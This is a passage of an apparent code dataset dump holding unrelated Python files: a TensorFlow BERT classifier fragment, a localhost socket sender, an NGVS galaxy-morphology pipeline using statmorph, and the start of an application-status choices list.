output_layer.shape[-1]\n        else:\n            pool_size=config.sequence_length\n\n        # pooling + dropout\n        if self.config.is_avg_pool:\n            if config.pool=='mean':\n                avpooled_out = tf.layers.average_pooling1d(output_layer, pool_size=pool_size, strides=1) # shape = [batch, num_filters]\n            elif config.pool=='join':\n                avpooled_out = tf.layers.average_pooling1d(output_layer, pool_size=pool_size, strides=1) # shape = [batch, num_filters]\n                maxpooled_out = tf.layers.max_pooling1d(output_layer, pool_size=config.sequence_length, strides=1)\n                avpooled_out = tf.concat([avpooled_out,maxpooled_out],axis=-1)\n                hidden_size = 2*hidden_size\n            else:\n                avpooled_out = tf.layers.max_pooling1d(output_layer,pool_size=config.sequence_length,strides=1)\n            avpooled_out = tf.reshape(avpooled_out, [-1, hidden_size])\n        else:\n            avpooled_out = output_layer[:, 0:1, :] # pooled_output\n            avpooled_out = tf.squeeze(avpooled_out, axis=1)\n\n\n        def logits_and_predict(num_classes, name_scope=None):\n            with tf.name_scope(name_scope):\n                inputs = tf.nn.dropout(avpooled_out, keep_prob=config.keep_prob)\n                # inputs=avpooled_out\n                logits = tf.layers.dense(inputs, num_classes,\n                                         kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n                                         name='logits')\n                predict = tf.round(tf.sigmoid(logits), name=\"predict\")\n                return logits, predict\n\n        self.logits, self.predict = logits_and_predict(self.relation_num, name_scope='relation')\n        # print(self.logits)\n        self.one_hot_labels = tf.one_hot(self.label, depth=self.relation_num, dtype=tf.float32, name=\"one_hot_label\")\n        if config.loss=='focal_loss':\n            self.loss =focal_loss(self.one_hot_labels,self.logits,[16902,25392,57619])\n        else:\n            losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.one_hot_labels, logits=self.logits, name='losses')\n            self.loss = tf.reduce_mean(tf.reduce_sum(losses, axis=1), name='loss')\n\n\n    def init_embedding(self, bert_init=True):\n        with tf.name_scope('embedding'):\n            word_embedding = self.bert_embed(bert_init)\n            print('self.config.embed_dense_dim:', self.config.embed_dense_dim)\n            word_embedding = tf.layers.dense(word_embedding, self.config.embed_dense_dim, activation=tf.nn.relu)\n            hidden_size = word_embedding.shape[-1].value\n            self.word_embedding = word_embedding\n            print(word_embedding.shape)\n            self.output_layer_hidden_size = hidden_size\n\n    def bert_embed(self, bert_init=True):\n        bert_config_file = self.config.bert_config_file\n        bert_config = BertConfig.from_json_file(bert_config_file)\n        model = BertModel(\n            config=bert_config,\n            is_training=self.is_training, # fine-tune\n            input_ids=self.input_x_word,\n            input_mask=self.input_mask,\n            token_type_ids=None,\n            use_one_hot_embeddings=False)\n\n        layer_logits = []\n        for i, layer in enumerate(model.all_encoder_layers):\n            layer_logits.append(\n                tf.layers.dense(\n                    layer, 1,\n                    kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n                    name=\"layer_logit%d\" % i\n                )\n            )#[batch_size]\n\n        layer_logits = tf.concat(layer_logits, axis=2) # concatenate along the third dimension\n        layer_dist = tf.nn.softmax(layer_logits)\n        seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n        pooled_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n        pooled_output = tf.squeeze(pooled_output, axis=2)\n        pooled_layer = pooled_output\n\n        char_bert_outputs = pooled_layer\n\n        A_output =pooled_layer\n        R_output = model.get_sequence_output()\n        RoA = tf.multiply(R_output, A_output)\n        R_A = tf.add(R_output, A_output)\n        fill_output = tf.concat([R_output, A_output, RoA, R_A],\n                                axis=2) # [batch_size,seq_len,hidden_size*4]; a dense layer of embed_dense_dim follows later\n\n        # 
\"\"\"Hire_bert\"\"\"\n\n        def BidirectionalGRUEncoder(hidden_dim,inputs,name):\n            # Bidirectional GRU encoding layer: encodes all word vectors of a sentence (or all sentence vectors of a document) into a 2*hidden_size output vector; an attention layer then weights all word/sentence output vectors into a final sentence/document vector.\n            # the input tensor has shape [batch_size, max_len, hidden_size]\n            # parameter sharing\n            with tf.variable_scope(name_or_scope=name, reuse=tf.AUTO_REUSE):\n                #\n                # forward\n                GRU_cell_fw = tf.contrib.rnn.GRUCell(hidden_dim) # tunable parameter\n                # backward\n                GRU_cell_bw = tf.contrib.rnn.GRUCell(hidden_dim) # tunable parameter\n                ((fw_outputs, bw_outputs), (_, _)) = tf.nn.bidirectional_dynamic_rnn(cell_fw=GRU_cell_fw,\n                                                                                     cell_bw=GRU_cell_bw,\n                                                                                     inputs=inputs,\n                                                                                     sequence_length=None,\n                                                                                     dtype=tf.float32)\n                outputs = tf.concat((fw_outputs, bw_outputs), 2)\n                return outputs\n        layer_logits = []\n        # obtain the alpha (weight) for each layer\n        # shared parameters\n\n        for i, layer in enumerate(model.all_encoder_layers):\n            ### the BiGRU determines each layer's weight\n            # two stacked bidirectional GRUs\n            B_1 = BidirectionalGRUEncoder(self.config.gru_hidden_dim, layer,'bigru_1') # result is the forward and backward GRU outputs\n            B_2= BidirectionalGRUEncoder(self.config.gru_hidden_dim, B_1,'bigru2')\n            # concatenate the vectors from the four directions\n            U_layer=tf.concat((B_1,B_2), 2)\n            layer_logits.append(\n                tf.layers.dense(\n                    U_layer, 1,\n                    kernel_initializer=tf.truncated_normal_initializer(stddev=0.02),\n                    name=\"addgrulayer_logit%d\" % i\n                )\n            )\n        # obtain the alpha (weight) for each layer\n        layer_logits = tf.concat(layer_logits, axis=2) # concatenate along the third dimension\n        layer_dist = tf.nn.softmax(layer_logits) # weights\n        seq_out = tf.concat([tf.expand_dims(x, axis=2) for x in model.all_encoder_layers], axis=2)\n        A_output = tf.matmul(tf.expand_dims(layer_dist, axis=2), seq_out)\n        A_output = tf.squeeze(A_output, axis=2)#\n        R_output=model.get_sequence_output()\n        RoA=tf.multiply(R_output, A_output)\n        R_A=tf.add(R_output,A_output)\n        Mire_output=tf.concat([R_output,A_output,RoA,R_A],axis=2) # [batch_size,seq_len,hidden_size*4]; a dense layer of embed_dense_dim follows later\n\n        if self.config.use_origin_bert=='ori':\n            final_hidden_states = model.get_sequence_output() # vanilla BERT\n            self.config.embed_dense_dim = 768\n        elif self.config.use_origin_bert=='hire':\n            final_hidden_states = Mire_output # hirebert\n        elif self.config.use_origin_bert=='dym':\n            final_hidden_states = char_bert_outputs # multi-layer fused BERT\n            self.config.embed_dense_dim = 512\n        elif self.config.use_origin_bert == 'fill_bert':\n            final_hidden_states = fill_output # multi-layer fused BERT + complementary features\n        else:\n            raise SyntaxError# print('invalid parameter value') config.use_origin_bert\n\n\n        tvars = tf.trainable_variables()\n        init_checkpoint = self.config.bert_file # './chinese_L-12_H-768_A-12/bert_model.ckpt'\n        assignment_map, initialized_variable_names = get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n        if bert_init:\n            tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n        tf.logging.info(\"**** Trainable Variables ****\")\n        for var in tvars:\n            init_string = \"\"\n            if var.name in initialized_variable_names:\n                init_string = \", *INIT_FROM_CKPT*\"\n            print(\" name = {}, shape = {}{}\".format(var.name, var.shape, init_string))\n        print('init bert from checkpoint: {}'.format(init_checkpoint))\n        return final_hidden_states\n","sub_path":"emoion/preprocess/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":15877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"203151040","text":"import socket\nfrom struct import pack\n\n\nHOST = '127.0.0.1'\nPORT = 65430\n\n\ndef send_to_socket(msg):\n    while True:\n        try:\n            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n                s.connect((HOST, PORT))\n                s.sendall(msg)\n        except ConnectionResetError:\n            continue\n        except ConnectionRefusedError:\n            continue\n        break\n    \n    \ndef 
send_data(PACKING, *args): \n msg = pack(PACKING, *args)\n send_to_socket(msg)\n \n \nif __name__=='__main__':\n send_data('?ifi', True, 3, 0, 0)\n ","sub_path":"src/socket_messaging.py","file_name":"socket_messaging.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445206518","text":"import pandas as pd\nfrom astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport photutils\nfrom photutils import segmentation as seg\nimport scipy.ndimage as ndi\nimport statmorph\nfrom astropy.visualization import (AsinhStretch, LogStretch, ImageNormalize)\nimport sys\nfrom astropy import wcs\nimport urllib.request\nfrom urllib.error import HTTPError, URLError\nimport multiprocessing as mp\nimport os\nfrom os import path\nimport time\nimport statistics\nfrom matplotlib import gridspec\nimport math\n\n\n# Delete the temporary galaxy files\ndef clearTempFiles(galaxy):\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits') \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'):\n os.system(f'rm /mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')\n\n\n# Check if any galaxy files downloaded are 0 MB\ndef checkCorrupt(galaxy):\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n 
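# (Added note.) A zero-byte file indicates a truncated vcp download; any such file makes checkCorrupt() return True.\n        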
if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits') == 0):\n return True;\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'):\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits') == 0):\n return True;\n return False;\n\n \n# Determine if pixel [i,j] is within ellipse area\ndef inEllipse(i,j,xCenter,yCenter,size,ratio,angle):\n\n # Size is effective radius of galaxy which is then multiplied by a number to increase size of ellipse\n if (size > 160):\n size = 10*size\n else: \n size = 4*size\n\n x = (i-xCenter)\n y = (j-yCenter)\n a = math.sqrt((size**2)/ratio)\n b = (size**2)/a\n\n if( (((((x*math.cos(math.radians(angle))) - (y*math.sin(math.radians(angle))))**2) / (a**2)) + ((((y*math.cos(math.radians(angle))) + (x*math.sin(math.radians(angle))))**2) / (b**2))) <= 1):\n return True\n\n\ndef statmorphWrapper(index_pairs):\n \n df = pd.read_csv('NGVSgalaxies.csv')\n\n # Iterate through rows in csv file containing measurements for each galaxy\n for row in df.iloc[index_pairs[0]:index_pairs[1]].itertuples(index=True, name='Pandas'):\n galaxy = row.Official_name\n base = 'https://www.cadc-ccda.hia-iha.nrc-cnrc.gc.ca/files/vault/ngvs/data/NGVS/galaxies/'\n galaxyPath = f'{galaxy}/{galaxy}_G'\n\n # Create check file for current galaxy\n print(f'checking {galaxy}')\n writeFile = open(f'/mnt/scratch/check/{galaxy}.txt', 'w') \n writeFile.write('checking')\n writeFile.close()\n\n\n startcopy = time.time()\n # Try to copy galaxy files\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxy}/{galaxy}_G.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_iso_model.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_galfit_model.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_mask.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_psf.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_sig.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_iso_residual.fits /mnt/scratch/temp_galaxy_storage')\n os.system(f'vcp vos:ngvs/data/NGVS/galaxies/{galaxyPath}_galfit_residual.fits /mnt/scratch/temp_galaxy_storage')\n endcopy = time.time() - startcopy\n\n # If one of the required files is missing, continue to next galaxy \n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') or (not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits') and not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')) or not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits') or not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits') or not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits') or (not \\\n path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits') and not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits'))):\n print(f'missing {galaxy}')\n writeFile = open(f'/mnt/scratch/missing/{galaxy}.txt', 'w') \n writeFile.write(f'{galaxy}\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits')):\n writeFile.write('missing original\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')):\n writeFile.write('missing iso 
model\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')):\n writeFile.write('missing galfit model\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')):\n writeFile.write('missing mask\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')):\n writeFile.write('missing psf\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')):\n writeFile.write('missing sig\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')):\n writeFile.write('missing iso residual\\n')\n if(not path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')):\n writeFile.write('missing galfit residual\\n')\n \n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n # ONLY PROCESS SMALLER FILES\n #---------------------------------------------------------------------------------------\n if(os.path.getsize(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits') >= 300000000):\n writeFile = open(f'/mnt/scratch/largefile/{galaxy}.txt', 'w') \n writeFile.write(f'{galaxy}\\n')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n #---------------------------------------------------------------------------------------\n\n # If any of the galaxy files are empty then create galaxy corrupt file and continue to next galaxy\n if(checkCorrupt(galaxy)):\n writeFile = open(f'/mnt/scratch/corrupt/{galaxy}.txt', 'w') \n writeFile.write(f'corrupt\\n')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n # Beginning of segmentation map creation\n\n startseg = time.time()\n\n hdu = fits.open(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G.fits')\n im_header = hdu[0].header\n im_data = hdu[0].data\n\n # Sky subtraction from original image\n sky_data = np.zeros(np.shape(im_data))\n sky_data += row.SKY\n im_sky_subtracted = im_data - sky_data\n\n # Calculate nucleus center\n ra = row.NGVS_ra\n dec = row.NGVS_dec\n mywcs = wcs.WCS(im_header)\n xCenter, yCenter = mywcs.all_world2pix([[ra, dec]], 0)[0]\n\n mask_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_mask.fits')\n\n # If a iso model exists then use that file for the original model data, otherwise use galfit\n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits'):\n original_model_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_model.fits')\n else:\n original_model_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_model.fits')\n\n # If nucleus exists then mask nucleus\n if(row.Nuc_Flag == 1):\n for i in range(len(mask_data)):\n for j in range(len(mask_data)):\n # TODO: Change radius of nucleus mask\n if(((i-xCenter)**2) + ((j-yCenter)**2) <= (5**2)):\n mask_data[i][j] = 100\n \n \n ellipse_data = np.zeros(np.shape(original_model_data))\n # Calculate median of original model values within 10 pixel radius from nucleus center\n pixelList = []\n for i in range(len(original_model_data)):\n for j in range(len(original_model_data)):\n if(((i-xCenter)**2) + ((j-yCenter)**2) <= (10**2) and mask_data[i][j] != 100):\n pixelList.append(original_model_data[i][j]) \n\n median = statistics.median(pixelList)\n\n # Create Segmentation Map\n seg_data = np.zeros(np.shape(original_model_data))\n ellipse_data = np.zeros(np.shape(original_model_data))\n \n # isEmpty flag is used for checking if a segmentation map is valid for processing. 
If segmentation map 2D list is all 0's then script crashes.\n isEmpty = True\n\n # if median is greater than 2*sky value then create segmentation map from original model values greater than 1.4*sky value within ellipse area\n if(median > 2*row.SKY):\n for i in range(len(original_model_data)): \n for j in range(len(original_model_data)):\n if(inEllipse(i,j,xCenter,yCenter,row.Size,row.AxisRatio,row.PA)):\n ellipse_data[i][j] = 100\n if(original_model_data[i][j] > (1.4*row.SKY)):\n seg_data[i][j] = 100\n isEmpty = False\n # If median is less than 2*sky value then create segmentation map from original model values greater than 1.1*sky value within ellipse area\n else:\n for i in range(len(original_model_data)):\n for j in range(len(original_model_data)):\n if(inEllipse(i,j,xCenter,yCenter,row.Size,row.AxisRatio,row.PA)):\n ellipse_data[i][j] = 100\n if(original_model_data[i][j] > (1.1*row.SKY)):\n seg_data[i][j] = 100\n isEmpty = False\n\n psf = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_psf.fits')\n weightmap = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_sig.fits')\n mask_data = np.array(mask_data, dtype=bool)\n\n endseg = time.time() - startseg\n \n # End of segmentation map creation\n\n\n # If the galaxy's segmentation map is empty with no area of interest, then create empty galaxy file and continue to next galaxy\n if(isEmpty): \n writeFile = open(f'/mnt/scratch/emptyseg/{galaxy}.txt', 'w') \n writeFile.write('empty')\n writeFile.close()\n clearTempFiles(galaxy)\n continue\n\n start_time = time.time()\n\n # run statmorph on current galaxy\n source_morphs = statmorph.source_morphology(im_sky_subtracted, seg_data, mask=mask_data, weightmap=weightmap, psf=psf)\n end_time = time.time() - start_time\n\n morph = source_morphs[0]\n\n startmodelcreate = time.time()\n\n # create model from statmorph results\n ny, nx = im_sky_subtracted.shape\n y, x = np.mgrid[0:ny, 0:nx]\n fitted_model = statmorph.ConvolvedSersic2D(\n amplitude=morph.sersic_amplitude,\n r_eff=morph.sersic_rhalf,\n n=morph.sersic_n,\n x_0=morph.sersic_xc,\n y_0=morph.sersic_yc,\n ellip=morph.sersic_ellip,\n theta=morph.sersic_theta)\n fitted_model.set_psf(psf)\n output_model_data = fitted_model(x, y)\n\n endmodelcreate = time.time() - startmodelcreate\n \n if path.isfile(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits'):\n original_res_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_iso_residual.fits')\n else:\n original_res_data = fits.getdata(f'/mnt/scratch/temp_galaxy_storage/{galaxy}_G_galfit_residual.fits')\n\n\n startfig = time.time()\n\n # normalize images, models, segmentation map\n output_res_data = im_sky_subtracted - output_model_data\n p1 = 10. 
; p2 = 90.\n\n im_p1 = np.percentile(im_sky_subtracted.ravel(), p1)\n im_p2 = np.percentile(im_sky_subtracted.ravel(), p2)\n normSky = ImageNormalize(im_sky_subtracted, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(output_model_data.ravel(), p1)\n im_p2 = np.percentile(output_model_data.ravel(), p2)\n normOutputMod = ImageNormalize(output_model_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(original_model_data.ravel(), p1)\n im_p2 = np.percentile(original_model_data.ravel(), p2)\n normOriginalMod = ImageNormalize(original_model_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(output_res_data.ravel(), p1)\n im_p2 = np.percentile(output_res_data.ravel(), p2)\n normOutputRes = ImageNormalize(output_res_data, vmin=im_p1, vmax=im_p2)\n\n im_p1 = np.percentile(original_res_data.ravel(), p1)\n im_p2 = np.percentile(original_res_data.ravel(), p2)\n normOriginalRes = ImageNormalize(original_res_data, vmin=im_p1, vmax=im_p2)\n\n # create figures for images, models, segmentation map\n gs = gridspec.GridSpec(2, 4, width_ratios=[1, 1, 1, 1],\n wspace=0.2, hspace=0, top=0.7, bottom=0.05, left=0.1, right=0.5)\n\n fig = plt.figure(figsize=(30,10))\n\n ax= plt.subplot(gs[0,0])\n ax.imshow(im_sky_subtracted, norm=normSky, cmap='gray', origin='lower')\n ax.set_title('Sky Subtracted Image', fontsize=15)\n\n ax= plt.subplot(gs[0,1])\n ax.imshow(original_model_data, norm=normOriginalMod, cmap='gray', origin='lower')\n ax.set_title('Original Model', fontsize=15)\n\n ax= plt.subplot(gs[0,2])\n ax.imshow(output_model_data, norm=normOutputMod, cmap='gray', origin='lower')\n ax.set_title('Output Model', fontsize=15)\n\n ax= plt.subplot(gs[0,3])\n ax.imshow(mask_data, cmap='gray', origin='lower')\n ax.set_title('Mask', fontsize=15)\n\n ax= plt.subplot(gs[1,0])\n ax.imshow(seg_data, cmap='gray', origin='lower')\n ax.set_title('Segmap', fontsize=15)\n\n ax= plt.subplot(gs[1,1])\n ax.imshow(ellipse_data, cmap='gray', origin='lower')\n ax.set_title('Ellipse Area', fontsize=15)\n\n ax= plt.subplot(gs[1,2])\n ax.imshow(original_res_data, norm=normOriginalRes, cmap='gray', origin='lower')\n ax.set_title('Original Residual', fontsize=15)\n\n ax= plt.subplot(gs[1,3])\n ax.imshow(output_res_data, norm=normOutputRes, cmap='gray', origin='lower')\n ax.set_title('Output Residual', fontsize=15)\n\n endfig = time.time() - startfig\n\n # save figures as PNG image to output directory\n fig.savefig(f'/mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png', facecolor='w', edgecolor='w', transparent=False, bbox_inches='tight')\n plt.close(fig)\n\n \n # UNCOMMENT TO SAVE AS MULTI EXTENSION FITS FILE INSTEAD OF PNG \n #------------------------------------------------------------------------------------------------------------------------ \n # primary_hdu = fits.PrimaryHDU(im_sky_subtracted, header=im_header)\n # image_hdu = fits.ImageHDU(output_model_data)\n # image_hdu2 = fits.ImageHDU(output_res_data)\n # hdul = fits.HDUList([primary_hdu, image_hdu, image_hdu2])\n\n # upload fits file to VOSpace\n # hdul.writeto(f'/mnt/scratch/output/{galaxy}_output.fits', overwrite=True)\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_output.fits vos:ngvs/data/STATMORPH/FITS_output/{galaxy}_output.fits')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_output.fits'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_output.fits')\n 
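# (Added, illustrative sketch -- not part of the original script.) Reading such a multi-extension file back:\n        #     from astropy.io import fits\n        #     with fits.open(f'/mnt/scratch/output/{galaxy}_output.fits') as hdul:\n        #         sky_sub, model, residual = hdul[0].data, hdul[1].data, hdul[2].data\n        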
#------------------------------------------------------------------------------------------------------------------------\n \n # UPLOAD PNG FILE WITH FLAGS\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png \\\n # vos:ngvs/data/STATMORPH/filesize_bug/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_Flag={morph.flag}_SersicFlag={morph.flag_sersic}.png')\n\n\n # UPLOAD PNG FILE WITH MEDIAN & SKY VALUES\n # os.system(f'vcp /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png \\\n # vos:ngvs/data/STATMORPH/memory_bug/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png')\n # if path.isfile(f'/mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png'):\n # os.system(f'rm /mnt/scratch/output/{galaxy}_time:{round(end_time, 2)}_size={row.Size}_median={median}_2*sky={2*row.SKY}sky={row.SKY}.png')\n\n # UPLOAD PNG FILE WITH RUNNING TIMES & RE FACTOR & MAGNITUDE\n os.system(f'vcp /mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png \\\n vos:ngvs/data/STATMORPH/dec17/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png')\n if path.isfile(f'/mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png'):\n os.system(f'rm /mnt/scratch/output/{galaxy}_sourcemorph:{round(end_time, 2)}_seg={round(endseg, 2)}_RE={round(row.Size, 3)}_mag={round(row.principleg_mag_cg, 3)}.png')\n\n hdu.close()\n clearTempFiles(galaxy)\n print(f'complete {galaxy}')\n \nif __name__ == '__main__':\n\n #the index pairs represent the starting index and end index of the rows to parse in the csv for each process.\n\n #index_pairs = [[0,922], [922,1844], [1844,2766], [2766,3689]]\n index_pairs = [[200,250],[1000,1050], [2350,2400], [3050,3100]]\n #index_pairs = [[200,205],[1000,1005], [2350,2355], [3050,3055]]\n #index_pairs = [100,500]\n\n # multiprocessing option (index pairs must be 2D list)\n pool = mp.Pool(mp.cpu_count())\n pool.map(statmorphWrapper, index_pairs)\n \n # single process option (index pairs must be 1D list)\n #statmorphWrapper(index_pairs)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":21278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65258847","text":"APP_TYPE_OPTIONS = ( \r\n ( 'IAF', 'IAF' ),\r\n ( 'CAF', 'CAF' ),\r\n )\r\n\r\nPAYMENT_MODE = ( \r\n ( 1, 'Pay @ Home' ),\r\n ( 2, 'Cash Deposit at Bank' ),\r\n ( 3, 'Debit Card' ),\r\n ( 4, 'Credit Card' ),\r\n ( 5, 'Demand Draft' ),\r\n ( 6, 'Online Payment' ),\r\n )\r\n\r\nPAYMENT_STATUS = ( \r\n ( 0, 'Payment Awaited' ),\r\n ( 1, 'Payment Completed' )\r\n )\r\n\r\nAPP_STATUS = ( \r\n ( 'Accepted for Test', 'Accepted for Test' ),\r\n ( 'Rejected for Test', 'Rejected for Test' ),\r\n ( 'Accepted for GD/PI', 'Accepted for GD/PI' ),\r\n ( 'Rejected for GD/PI', 'Rejected for GD/PI' ),\r\n ( 'Accepted for 
